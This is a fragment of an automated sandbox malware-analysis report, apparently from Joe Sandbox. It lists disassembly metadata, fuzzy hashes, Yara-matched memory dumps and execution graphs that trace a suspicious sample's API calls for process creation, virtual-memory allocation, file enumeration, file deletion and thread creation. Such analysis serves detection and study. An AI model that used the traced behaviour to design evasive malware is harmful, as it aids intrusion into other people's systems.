                                                                                                                                                          • String ID: CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions$CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ$CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database$CLIENT(ntdll): Processing %ws for patching section protection for %wZ$CLIENT(ntdll): Processing section info %ws...$Execute=1$ExecuteOptions
                                                                                                                                                          • API String ID: 0-484625025
                                                                                                                                                          • Opcode ID: 0ebc8ffec744a5802cdd394e0c12ec06a1f638d04a1ae7c34691d8c57177219b
                                                                                                                                                          • Instruction ID: f62a8483db032cfc78897993bd57f21c5abea4fa4661b920dea9819ac0c8c8f8
                                                                                                                                                          • Opcode Fuzzy Hash: 0ebc8ffec744a5802cdd394e0c12ec06a1f638d04a1ae7c34691d8c57177219b
                                                                                                                                                          • Instruction Fuzzy Hash: 7A51383160420AAAEF21BBA8DC95FEE77A8FF58714F1400E9D6C5AB190DB709A41CF50
                                                                                                                                                          APIs
                                                                                                                                                          Strings
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 0000000B.00000002.2540920666.0000000001020000.00000040.00001000.00020000.00000000.sdmp, Offset: 01020000, based on PE: true
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_11_2_1020000_aspnet_compiler.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: __aulldvrm
                                                                                                                                                          • String ID: +$-$0$0
                                                                                                                                                          • API String ID: 1302938615-699404926
                                                                                                                                                          • Opcode ID: 53abcd45f1248799eb7edd6da4205106d70e70754ef1e870ff48280e40c18d32
                                                                                                                                                          • Instruction ID: ec2ed6da1069cec544d4faee4f39eab16cf99daa9a61bbe40b4cc1f9705626be
                                                                                                                                                          • Opcode Fuzzy Hash: 53abcd45f1248799eb7edd6da4205106d70e70754ef1e870ff48280e40c18d32
                                                                                                                                                          • Instruction Fuzzy Hash: 4E81A170E052499EEF258E6CE8B1FFEBBE1BF49330F184299D8D1A7291C6349841E751
                                                                                                                                                          APIs
                                                                                                                                                          Strings
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 0000000B.00000002.2540920666.0000000001020000.00000040.00001000.00020000.00000000.sdmp, Offset: 01020000, based on PE: true
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_11_2_1020000_aspnet_compiler.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: ___swprintf_l
                                                                                                                                                          • String ID: %%%u$[$]:%u
                                                                                                                                                          • API String ID: 48624451-2819853543
                                                                                                                                                          • Opcode ID: 2933e5a2f1ceb2613a66b5be73cf7af59a10dcfcd8f51000c496e4dae904fce6
                                                                                                                                                          • Instruction ID: 8475b32d62896e9a09aa8f76f1c0711d5abf0b1555ead4d0e194f32cb3327797
                                                                                                                                                          • Opcode Fuzzy Hash: 2933e5a2f1ceb2613a66b5be73cf7af59a10dcfcd8f51000c496e4dae904fce6
                                                                                                                                                          • Instruction Fuzzy Hash: 2321A4BAE00119ABDB15DF79CC54AFEBBF8EF54640F440126E945E7240E770D9018BA1
                                                                                                                                                          Strings
                                                                                                                                                          • RTL: Enter CriticalSection Timeout (%I64u secs) %d, xrefs: 010C02BD
                                                                                                                                                          • RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u, xrefs: 010C02E7
                                                                                                                                                          • RTL: Re-Waiting, xrefs: 010C031E
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 0000000B.00000002.2540920666.0000000001020000.00000040.00001000.00020000.00000000.sdmp, Offset: 01020000, based on PE: true
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_11_2_1020000_aspnet_compiler.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID:
                                                                                                                                                          • String ID: RTL: Enter CriticalSection Timeout (%I64u secs) %d$RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u$RTL: Re-Waiting
                                                                                                                                                          • API String ID: 0-2474120054
                                                                                                                                                          • Opcode ID: 9ef9586ec4745f3b826c05b55b1c5a8172799fb66693e6d291ccc5c61a3d83ef
                                                                                                                                                          • Instruction ID: a899a5795d69c735a933eed17db5689a16b643b1a352281d671e9147b9f22bc9
                                                                                                                                                          • Opcode Fuzzy Hash: 9ef9586ec4745f3b826c05b55b1c5a8172799fb66693e6d291ccc5c61a3d83ef
                                                                                                                                                          • Instruction Fuzzy Hash: 4AE1CE34A08742DFD765CF28C884B2ABBE1BB88714F144AADF5E58B2E1D774D844CB46
                                                                                                                                                          Strings
                                                                                                                                                          • RTL: Acquire Exclusive Sem Timeout %d (%I64u secs), xrefs: 010C7B7F
                                                                                                                                                          • RTL: Resource at %p, xrefs: 010C7B8E
                                                                                                                                                          • RTL: Re-Waiting, xrefs: 010C7BAC
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 0000000B.00000002.2540920666.0000000001020000.00000040.00001000.00020000.00000000.sdmp, Offset: 01020000, based on PE: true
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_11_2_1020000_aspnet_compiler.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID:
                                                                                                                                                          • String ID: RTL: Acquire Exclusive Sem Timeout %d (%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                                                                                                                                                          • API String ID: 0-871070163
                                                                                                                                                          • Opcode ID: 7f97f9d050caa77e53f343c4435cdf286d51db248c1dbd0b8ba2648d93def852
                                                                                                                                                          • Instruction ID: f002c1d71c3644a522d6ecd84b35e39eb14ef2fe1a04d9a2630f316c9d37c65a
                                                                                                                                                          • Opcode Fuzzy Hash: 7f97f9d050caa77e53f343c4435cdf286d51db248c1dbd0b8ba2648d93def852
                                                                                                                                                          • Instruction Fuzzy Hash: D841E3357047029FD721EF29C840B6ABBE5EF98710F100A5DF9D69B281DB71E4058F91
                                                                                                                                                          APIs
                                                                                                                                                          • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 010C728C
                                                                                                                                                          Strings
                                                                                                                                                          • RTL: Acquire Shared Sem Timeout %d(%I64u secs), xrefs: 010C7294
                                                                                                                                                          • RTL: Resource at %p, xrefs: 010C72A3
                                                                                                                                                          • RTL: Re-Waiting, xrefs: 010C72C1
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 0000000B.00000002.2540920666.0000000001020000.00000040.00001000.00020000.00000000.sdmp, Offset: 01020000, based on PE: true
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_11_2_1020000_aspnet_compiler.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                                                                                                                                                          • String ID: RTL: Acquire Shared Sem Timeout %d(%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                                                                                                                                                          • API String ID: 885266447-605551621
                                                                                                                                                          • Opcode ID: 09ab0720f2743c95e19eff21da273d6e025e87bdd3697fef3b60eecab5584c46
                                                                                                                                                          • Instruction ID: 86dacd0d6d1e29d47b68c1d1488e0bf22fbc5f4d81d7d6534f7b766dd715bb72
                                                                                                                                                          • Opcode Fuzzy Hash: 09ab0720f2743c95e19eff21da273d6e025e87bdd3697fef3b60eecab5584c46
                                                                                                                                                          • Instruction Fuzzy Hash: 0A41E231744607ABD721DF29CC41B6AB7E6FB94B20F14461DF9D5AB240DB21E8428FD1
                                                                                                                                                          APIs
                                                                                                                                                          Strings
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 0000000B.00000002.2540920666.0000000001020000.00000040.00001000.00020000.00000000.sdmp, Offset: 01020000, based on PE: true
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_11_2_1020000_aspnet_compiler.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: ___swprintf_l
                                                                                                                                                          • String ID: %%%u$]:%u
                                                                                                                                                          • API String ID: 48624451-3050659472
                                                                                                                                                          • Opcode ID: 20dc0040a066d315ae9ddf75e2749d5644c93998fea171626e21d1d4ca38a6a4
                                                                                                                                                          • Instruction ID: 3924f2fc24532d18d8a92e679655e7c4ca3482dd2e92a6295ba16d8d0f5f5cf0
                                                                                                                                                          • Opcode Fuzzy Hash: 20dc0040a066d315ae9ddf75e2749d5644c93998fea171626e21d1d4ca38a6a4
                                                                                                                                                          • Instruction Fuzzy Hash: D3318872A002199FDB25DF2DCC44BEEB7F8EB44610F444559E949D7240EB709A448B60
                                                                                                                                                          APIs
                                                                                                                                                          Strings
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 0000000B.00000002.2540920666.0000000001020000.00000040.00001000.00020000.00000000.sdmp, Offset: 01020000, based on PE: true
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_11_2_1020000_aspnet_compiler.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: __aulldvrm
                                                                                                                                                          • String ID: +$-
                                                                                                                                                          • API String ID: 1302938615-2137968064
                                                                                                                                                          • Opcode ID: 0e72ee8b5e9315034f2b46ff5b251d52fedc42f24a18d50ff17db184198f4ea1
                                                                                                                                                          • Instruction ID: aa3f57097edb1a238069eb382dec08929cbfdc58e9a3e197d0c46f457dee2b57
                                                                                                                                                          • Opcode Fuzzy Hash: 0e72ee8b5e9315034f2b46ff5b251d52fedc42f24a18d50ff17db184198f4ea1
                                                                                                                                                          • Instruction Fuzzy Hash: F991A372E1020A9BEF64DF6DC8B16BEBBF5AF84720F14455AE9D5A72C0D7308940AF11
                                                                                                                                                          Strings
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 0000000B.00000002.2540920666.0000000001020000.00000040.00001000.00020000.00000000.sdmp, Offset: 01020000, based on PE: true
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_11_2_1020000_aspnet_compiler.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID:
                                                                                                                                                          • String ID: $$@
                                                                                                                                                          • API String ID: 0-1194432280
                                                                                                                                                          • Opcode ID: e8415389d11bf9b60955b007b4d4b1bf96fc1bfbaad85907c767cdde2bb3e3d9
                                                                                                                                                          • Instruction ID: 050dd25d7a0c8c435ca52c7c64bfe9adb428acdc742548181c98764cdf585374
                                                                                                                                                          • Opcode Fuzzy Hash: e8415389d11bf9b60955b007b4d4b1bf96fc1bfbaad85907c767cdde2bb3e3d9
                                                                                                                                                          • Instruction Fuzzy Hash: 248129B1D00269DBDB75DB54CC44BEEBBB8AB48754F0041EAEA59B7240D7309E84CFA4
                                                                                                                                                          APIs
                                                                                                                                                          • @_EH4_CallFilterFunc@8.LIBCMT ref: 010DCFBD
                                                                                                                                                          Strings
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 0000000B.00000002.2540920666.0000000001020000.00000040.00001000.00020000.00000000.sdmp, Offset: 01020000, based on PE: true
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_11_2_1020000_aspnet_compiler.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: CallFilterFunc@8
                                                                                                                                                          • String ID: @$@4Cw@4Cw
                                                                                                                                                          • API String ID: 4062629308-3101775584
                                                                                                                                                          • Opcode ID: 8e20f172652a86dcc3d281bbfe66b6ef007eb6df33894e060dcc7d8baf977f86
                                                                                                                                                          • Instruction ID: 956e47c0b60d0a84284156c1e3648d7f1cf98616b50881c9422e82781e1c27a3
                                                                                                                                                          • Opcode Fuzzy Hash: 8e20f172652a86dcc3d281bbfe66b6ef007eb6df33894e060dcc7d8baf977f86
                                                                                                                                                          • Instruction Fuzzy Hash: 9B41BC71900329DFDB259FA9D940AAEBBB8FF95B50F04406AEA94DB294D7308841CB60

                                                                                                                                                          Execution Graph

                                                                                                                                                          Execution Coverage:2.5%
                                                                                                                                                          Dynamic/Decrypted Code Coverage:0%
                                                                                                                                                          Signature Coverage:0%
                                                                                                                                                          Total number of Nodes:3
                                                                                                                                                          Total number of Limit Nodes:0
                                                                                                                                                          execution_graph 12352 6c3e620 12353 6c3e63d 12352->12353 12354 6c3e64c closesocket 12353->12354

                                                                                                                                                          Control-flow Graph

                                                                                                                                                          • Executed
                                                                                                                                                          • Not Executed
                                                                                                                                                          control_flow_graph 0 6c3e620-6c3e65a call 6c16760 call 6c3f1f0 closesocket
                                                                                                                                                          APIs
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 0000000C.00000002.4516216085.0000000006BD0000.00000040.80000000.00040000.00000000.sdmp, Offset: 06BD0000, based on PE: false
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_12_2_6bd0000_lSomfUdjbC.jbxd
                                                                                                                                                          Yara matches
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: closesocket
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID: 2781271927-0
                                                                                                                                                          • Opcode ID: 9273b273d68921ec2e4ed655abae52dd9e467ff9c2a7a03049c789026ff8e20a
                                                                                                                                                          • Instruction ID: 844da6648df191117deea6de83c25b5747ce478de907163cafc54a3620f351a8
                                                                                                                                                          • Opcode Fuzzy Hash: 9273b273d68921ec2e4ed655abae52dd9e467ff9c2a7a03049c789026ff8e20a
                                                                                                                                                          • Instruction Fuzzy Hash: 90E08C7A2402587BD2A0FA5ADC40DEBB3ACDFC6710B00442AFE18A7240CAB0B90187F0
                                                                                                                                                          Strings
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 0000000C.00000002.4516216085.0000000006BD0000.00000040.80000000.00040000.00000000.sdmp, Offset: 06BD0000, based on PE: false
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_12_2_6bd0000_lSomfUdjbC.jbxd
                                                                                                                                                          Yara matches
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID:
                                                                                                                                                          • String ID: $#b$*^$1$2D$?T$@$@u$AY$H$H~$N$U2#b$dC$f$ox$s$w9
                                                                                                                                                          • API String ID: 0-2158957546
                                                                                                                                                          • Opcode ID: 7ae9e3a38e60a6df40b485f7d19046d7be571d3d3e1ff6c6370e8e3837faebf5
                                                                                                                                                          • Instruction ID: f3928c4627df0e13df9835811d19572995b523d255f9b990b885c0b65191a5a0
                                                                                                                                                          • Opcode Fuzzy Hash: 7ae9e3a38e60a6df40b485f7d19046d7be571d3d3e1ff6c6370e8e3837faebf5
                                                                                                                                                          • Instruction Fuzzy Hash: BAE1EDB0D05269CBEB64CF85C998BADBBB2BB45308F1081DDC11D7B281C7B95A89DF50
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 0000000C.00000002.4516216085.0000000006BD0000.00000040.80000000.00040000.00000000.sdmp, Offset: 06BD0000, based on PE: false
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_12_2_6bd0000_lSomfUdjbC.jbxd
                                                                                                                                                          Yara matches
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID:
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID:
                                                                                                                                                          • Opcode ID: 1a73273a0a5193faa63b0982bfbae7d8ba74a5c79729ba2dfd1896fb596de7d1
                                                                                                                                                          • Instruction ID: f12f1f084c159121ac51be78de4d0ebfc3eb8af03e2834aebcaf4b34a8cad757
                                                                                                                                                          • Opcode Fuzzy Hash: 1a73273a0a5193faa63b0982bfbae7d8ba74a5c79729ba2dfd1896fb596de7d1
                                                                                                                                                          • Instruction Fuzzy Hash: CFC01222A000158E85142EA8B0420B8F3B0E687232F0079F6EE196A401422284249ACE
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 0000000C.00000002.4516216085.0000000006BD0000.00000040.80000000.00040000.00000000.sdmp, Offset: 06BD0000, based on PE: false
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_12_2_6bd0000_lSomfUdjbC.jbxd
                                                                                                                                                          Yara matches
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID:
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID:
                                                                                                                                                          • Opcode ID: 21cf719c463026e3209ef41efbc25897af294f43bea7ed2b5e46da329f44e439
                                                                                                                                                          • Instruction ID: 0f2a9792e17cece4042f31dfd1a98d0234a938b193eab56c82b14204e5d552b3
                                                                                                                                                          • Opcode Fuzzy Hash: 21cf719c463026e3209ef41efbc25897af294f43bea7ed2b5e46da329f44e439
                                                                                                                                                          • Instruction Fuzzy Hash: 5FA00117F860184248246C8AB8611B5E368D287176D90B2A7DE0CB35005406C42501DE

                                                                                                                                                          Execution Graph

                                                                                                                                                          Execution Coverage:3%
                                                                                                                                                          Dynamic/Decrypted Code Coverage:4%
                                                                                                                                                          Signature Coverage:1.5%
                                                                                                                                                          Total number of Nodes:479
                                                                                                                                                          Total number of Limit Nodes:77
                                                                                                                                                          execution_graph 85882 2929b10 85883 2929d39 85882->85883 85885 292a038 85883->85885 85886 294a950 85883->85886 85887 294a976 85886->85887 85892 2924170 85887->85892 85889 294a982 85891 294a9bb 85889->85891 85895 2944fe0 85889->85895 85891->85885 85899 2932c40 85892->85899 85894 292417d 85894->85889 85896 2945042 85895->85896 85898 294504f 85896->85898 85923 2931460 85896->85923 85898->85891 85900 2932c5a 85899->85900 85902 2932c70 85900->85902 85903 29496b0 85900->85903 85902->85894 85904 29496ca 85903->85904 85905 29496f9 85904->85905 85910 2948370 85904->85910 85905->85902 85911 294838a 85910->85911 85917 4842c0a 85911->85917 85912 29483b3 85914 294ace0 85912->85914 85920 2948ff0 85914->85920 85916 2949766 85916->85902 85918 4842c11 85917->85918 85919 4842c1f LdrInitializeThunk 85917->85919 85918->85912 85919->85912 85921 294900a 85920->85921 85922 2949018 RtlFreeHeap 85921->85922 85922->85916 85924 2931498 85923->85924 85939 29378a0 85924->85939 85926 29314a0 85938 293176d 85926->85938 85950 294adc0 85926->85950 85928 29314b6 85929 294adc0 RtlAllocateHeap 85928->85929 85930 29314c7 85929->85930 85931 294adc0 RtlAllocateHeap 85930->85931 85932 29314d8 85931->85932 85933 293156f 85932->85933 85962 2936430 NtClose LdrInitializeThunk LdrInitializeThunk LdrInitializeThunk 85932->85962 85953 2933f70 85933->85953 85936 2931722 85958 2947920 85936->85958 85938->85898 85940 29378cc 85939->85940 85963 2937790 85940->85963 85943 2937911 85946 293792d 85943->85946 85948 2948cb0 NtClose 85943->85948 85944 29378f9 85945 2937904 85944->85945 85969 2948cb0 85944->85969 85945->85926 85946->85926 85949 2937923 85948->85949 85949->85926 85977 2948fb0 85950->85977 85952 294addb 85952->85928 85955 2933f94 85953->85955 85954 2933f9b 85954->85936 85955->85954 85956 2933fd0 LdrLoadDll 85955->85956 85957 2933fe7 85955->85957 85956->85957 85957->85936 85959 2947982 85958->85959 85961 294798f 85959->85961 85980 2931780 85959->85980 85961->85938 85962->85933 85964 2937886 85963->85964 85965 29377aa 85963->85965 85964->85943 85964->85944 85972 2948400 85965->85972 85968 2948cb0 NtClose 85968->85964 85970 2948ccd 85969->85970 85971 2948cdb NtClose 85970->85971 85971->85945 85973 294841a 85972->85973 85976 48435c0 LdrInitializeThunk 85973->85976 85974 293787a 85974->85968 85976->85974 85978 2948fca 85977->85978 85979 2948fd8 RtlAllocateHeap 85978->85979 85979->85952 85996 2937b70 85980->85996 85982 2931cf0 85982->85961 85983 29317a0 85983->85982 86000 2940b30 85983->86000 85986 29319b3 86009 294bfd0 85986->86009 85987 29317fb 85987->85982 86004 294bea0 85987->86004 85990 29319c8 85992 2931a18 85990->85992 86015 29302b0 85990->86015 85992->85982 85994 29302b0 LdrInitializeThunk 85992->85994 86018 2937b10 85992->86018 85993 2937b10 LdrInitializeThunk 85995 2931b70 85993->85995 85994->85992 85995->85992 85995->85993 85997 2937b7d 85996->85997 85998 2937ba2 85997->85998 85999 2937b9b SetErrorMode 85997->85999 85998->85983 85999->85998 86001 2940b49 86000->86001 86022 294ac60 86001->86022 86003 2940b51 86003->85987 86005 294beb6 86004->86005 86006 294beb0 86004->86006 86007 294adc0 RtlAllocateHeap 86005->86007 86006->85986 86008 294bedc 86007->86008 86008->85986 86010 294bf40 86009->86010 86011 294adc0 RtlAllocateHeap 86010->86011 86014 294bf9d 86010->86014 86012 294bf7a 86011->86012 86013 294ace0 RtlFreeHeap 86012->86013 86013->86014 86014->85990 86029 2948f20 86015->86029 86019 2937b23 86018->86019 86034 2948270 86019->86034 86021 2937b4e 86021->85992 86025 2948e00 86022->86025 86024 294ac8e 86024->86003 86026 2948e92 86025->86026 86027 2948e28 86025->86027 86028 2948ea5 NtAllocateVirtualMemory 86026->86028 86027->86024 86028->86024 86030 2948f3d 86029->86030 86033 4842c70 LdrInitializeThunk 86030->86033 86031 29302cf 86031->85995 86033->86031 86035 2948298 86034->86035 86036 29482eb 86034->86036 86035->86021 86039 4842dd0 LdrInitializeThunk 86036->86039 86037 294830d 86037->86021 86039->86037 86301 293bfd0 86303 293bff9 86301->86303 86302 293c0fc 86303->86302 86304 293c09e FindFirstFileW 86303->86304 86304->86302 86306 293c0b9 86304->86306 86305 293c0e3 FindNextFileW 86305->86306 86307 293c0f5 FindClose 86305->86307 86306->86305 86307->86302 86308 2936d50 86309 2936d65 86308->86309 86310 2936dbf 86308->86310 86309->86310 86312 293ac60 86309->86312 86313 293ac86 86312->86313 86314 293aeb3 86313->86314 86339 2949070 86313->86339 86314->86310 86316 293acff 86316->86314 86317 294bfd0 2 API calls 86316->86317 86318 293ad1e 86317->86318 86318->86314 86319 293adef 86318->86319 86320 2948370 LdrInitializeThunk 86318->86320 86321 2935540 LdrInitializeThunk 86319->86321 86323 293ae0b 86319->86323 86322 293ad7d 86320->86322 86321->86323 86322->86319 86325 293ad86 86322->86325 86327 293ae9b 86323->86327 86345 2947ef0 86323->86345 86324 293add7 86328 2937b10 LdrInitializeThunk 86324->86328 86325->86314 86325->86324 86326 293adb5 86325->86326 86342 2935540 86325->86342 86360 2944160 LdrInitializeThunk 86326->86360 86333 2937b10 LdrInitializeThunk 86327->86333 86332 293ade5 86328->86332 86332->86310 86335 293aea9 86333->86335 86334 293ae72 86350 2947fa0 86334->86350 86335->86310 86337 293ae8c 86355 2948100 86337->86355 86340 294908d 86339->86340 86341 294909b CreateProcessInternalW 86340->86341 86341->86316 86343 2948530 LdrInitializeThunk 86342->86343 86344 293557e 86343->86344 86344->86326 86346 2947f6d 86345->86346 86348 2947f1b 86345->86348 86361 48439b0 LdrInitializeThunk 86346->86361 86347 2947f8f 86347->86334 86348->86334 86351 2947fc8 86350->86351 86352 294801a 86350->86352 86351->86337 86362 4844340 LdrInitializeThunk 86352->86362 86353 294803c 86353->86337 86356 294817a 86355->86356 86357 2948128 86355->86357 86363 4842fb0 LdrInitializeThunk 86356->86363 86357->86327 86358 294819c 86358->86327 86360->86324 86361->86347 86362->86353 86363->86358 86040 2948c10 86041 2948c84 86040->86041 86043 2948c38 86040->86043 86042 2948c97 NtDeleteFile 86041->86042 86364 2945a50 86365 2945aaa 86364->86365 86367 2945ab7 86365->86367 86368 2943470 86365->86368 86369 294ac60 NtAllocateVirtualMemory 86368->86369 86371 29434ae 86369->86371 86370 29435ae 86370->86367 86371->86370 86372 2933f70 LdrLoadDll 86371->86372 86373 29434f4 86372->86373 86373->86370 86374 2943530 Sleep 86373->86374 86374->86373 86375 2941150 86376 294116c 86375->86376 86377 2941194 86376->86377 86378 29411a8 86376->86378 86379 2948cb0 NtClose 86377->86379 86380 2948cb0 NtClose 86378->86380 86381 294119d 86379->86381 86382 29411b1 86380->86382 86385 294ae00 RtlAllocateHeap 86382->86385 86384 29411bc 86385->86384 86049 2931d00 86050 2948370 LdrInitializeThunk 86049->86050 86051 2931d36 86050->86051 86054 2948d40 86051->86054 86053 2931d4b 86055 2948dcc 86054->86055 86056 2948d68 86054->86056 86059 4842e80 LdrInitializeThunk 86055->86059 86056->86053 86057 2948dfa 86057->86053 86059->86057 86386 29355c0 86387 2937b10 LdrInitializeThunk 86386->86387 86388 29355f0 86387->86388 86390 293561c 86388->86390 86391 2937a90 86388->86391 86392 2937ad4 86391->86392 86393 2937af5 86392->86393 86398 2948050 86392->86398 86393->86388 86395 2937ae5 86396 2937b01 86395->86396 86397 2948cb0 NtClose 86395->86397 86396->86388 86397->86393 86399 29480ca 86398->86399 86400 2948078 86398->86400 86403 4844650 LdrInitializeThunk 86399->86403 86400->86395 86401 29480ec 86401->86395 86403->86401 86060 2939607 86061 2939617 86060->86061 86062 293961e 86061->86062 86063 294ace0 RtlFreeHeap 86061->86063 86063->86062 86064 294bf00 86065 294ace0 RtlFreeHeap 86064->86065 86066 294bf15 86065->86066 86409 4842ad0 LdrInitializeThunk 86410 29489c0 86411 2948a74 86410->86411 86413 29489ec 86410->86413 86412 2948a87 NtCreateFile 86411->86412 86414 29451c0 86415 2945221 86414->86415 86416 294522e 86415->86416 86418 2936dd0 86415->86418 86419 2936db7 86418->86419 86420 2936e05 86419->86420 86421 293ac60 9 API calls 86419->86421 86420->86420 86422 2936dbf 86421->86422 86422->86416 86067 293088b PostThreadMessageW 86068 293089d 86067->86068 86423 2935648 86424 29355f2 86423->86424 86425 2937a90 2 API calls 86424->86425 86426 293561c 86424->86426 86425->86424 86427 2932b4c 86428 2937790 2 API calls 86427->86428 86429 2932b5c 86428->86429 86430 2948cb0 NtClose 86429->86430 86431 2932b78 86429->86431 86430->86431 86069 2929ab0 86070 2929abf 86069->86070 86071 2929afd 86070->86071 86072 2929aea CreateThread 86070->86072 86073 293a730 86078 293a440 86073->86078 86075 293a73d 86092 293a0d0 86075->86092 86077 293a759 86079 293a465 86078->86079 86103 2937d80 86079->86103 86082 293a5b0 86082->86075 86084 293a5c7 86084->86075 86085 293a5be 86085->86084 86087 293a6b5 86085->86087 86122 2939b20 86085->86122 86089 293a71a 86087->86089 86131 2939e90 86087->86131 86090 294ace0 RtlFreeHeap 86089->86090 86091 293a721 86090->86091 86091->86075 86093 293a0e2 86092->86093 86096 293a0ed 86092->86096 86094 294adc0 RtlAllocateHeap 86093->86094 86094->86096 86095 293a10a 86095->86077 86096->86095 86097 2937d80 GetFileAttributesW 86096->86097 86098 293a415 86096->86098 86101 2939b20 RtlFreeHeap 86096->86101 86102 2939e90 RtlFreeHeap 86096->86102 86097->86096 86099 293a42a 86098->86099 86100 294ace0 RtlFreeHeap 86098->86100 86099->86077 86100->86099 86101->86096 86102->86096 86104 2937d9e 86103->86104 86105 2937da5 GetFileAttributesW 86104->86105 86106 2937db0 86104->86106 86105->86106 86106->86082 86107 2942d70 86106->86107 86108 2942d7e 86107->86108 86109 2942d85 86107->86109 86108->86085 86110 2933f70 LdrLoadDll 86109->86110 86111 2942dba 86110->86111 86112 2942dc9 86111->86112 86135 2942830 LdrLoadDll 86111->86135 86113 294adc0 RtlAllocateHeap 86112->86113 86118 2942f74 86112->86118 86115 2942de2 86113->86115 86116 2942f6a 86115->86116 86115->86118 86119 2942dfe 86115->86119 86117 294ace0 RtlFreeHeap 86116->86117 86116->86118 86117->86118 86118->86085 86119->86118 86120 294ace0 RtlFreeHeap 86119->86120 86121 2942f5e 86120->86121 86121->86085 86123 2939b46 86122->86123 86136 293d540 86123->86136 86125 2939bb8 86127 2939d40 86125->86127 86128 2939bd6 86125->86128 86126 2939d25 86126->86085 86127->86126 86129 29399e0 RtlFreeHeap 86127->86129 86128->86126 86141 29399e0 86128->86141 86129->86127 86132 2939eb6 86131->86132 86133 293d540 RtlFreeHeap 86132->86133 86134 2939f3d 86133->86134 86134->86087 86135->86112 86137 293d564 86136->86137 86138 293d571 86137->86138 86139 294ace0 RtlFreeHeap 86137->86139 86138->86125 86140 293d5b4 86139->86140 86140->86125 86142 29399fd 86141->86142 86145 293d5d0 86142->86145 86144 2939b03 86144->86128 86146 293d5f4 86145->86146 86147 293d69e 86146->86147 86148 294ace0 RtlFreeHeap 86146->86148 86147->86144 86148->86147 86432 2936b70 86433 2936b89 86432->86433 86441 2936bdc 86432->86441 86435 2948cb0 NtClose 86433->86435 86433->86441 86434 2936d0e 86436 2936ba4 86435->86436 86442 2935f60 NtClose LdrInitializeThunk LdrInitializeThunk 86436->86442 86438 2936ceb 86438->86434 86444 2936130 NtClose LdrInitializeThunk LdrInitializeThunk 86438->86444 86441->86434 86443 2935f60 NtClose LdrInitializeThunk LdrInitializeThunk 86441->86443 86442->86441 86443->86438 86444->86434 86154 29481b0 86155 294823c 86154->86155 86156 29481d8 86154->86156 86159 4842ee0 LdrInitializeThunk 86155->86159 86157 294826a 86159->86157 86160 292b020 86161 294ac60 NtAllocateVirtualMemory 86160->86161 86162 292c691 86161->86162 86163 293f220 86164 293f284 86163->86164 86194 2935cd0 86164->86194 86166 293f3be 86167 293f3b7 86167->86166 86201 2935de0 86167->86201 86170 293f563 86172 293f45e 86173 293f572 86172->86173 86210 293f000 86172->86210 86174 2948cb0 NtClose 86173->86174 86176 293f57c 86174->86176 86177 293f476 86177->86173 86178 293f481 86177->86178 86179 294adc0 RtlAllocateHeap 86178->86179 86180 293f4aa 86179->86180 86181 293f4b3 86180->86181 86182 293f4c9 86180->86182 86183 2948cb0 NtClose 86181->86183 86219 293eef0 CoInitialize 86182->86219 86185 293f4bd 86183->86185 86186 293f4d7 86222 29487b0 86186->86222 86188 293f552 86189 2948cb0 NtClose 86188->86189 86190 293f55c 86189->86190 86191 294ace0 RtlFreeHeap 86190->86191 86191->86170 86192 293f4f5 86192->86188 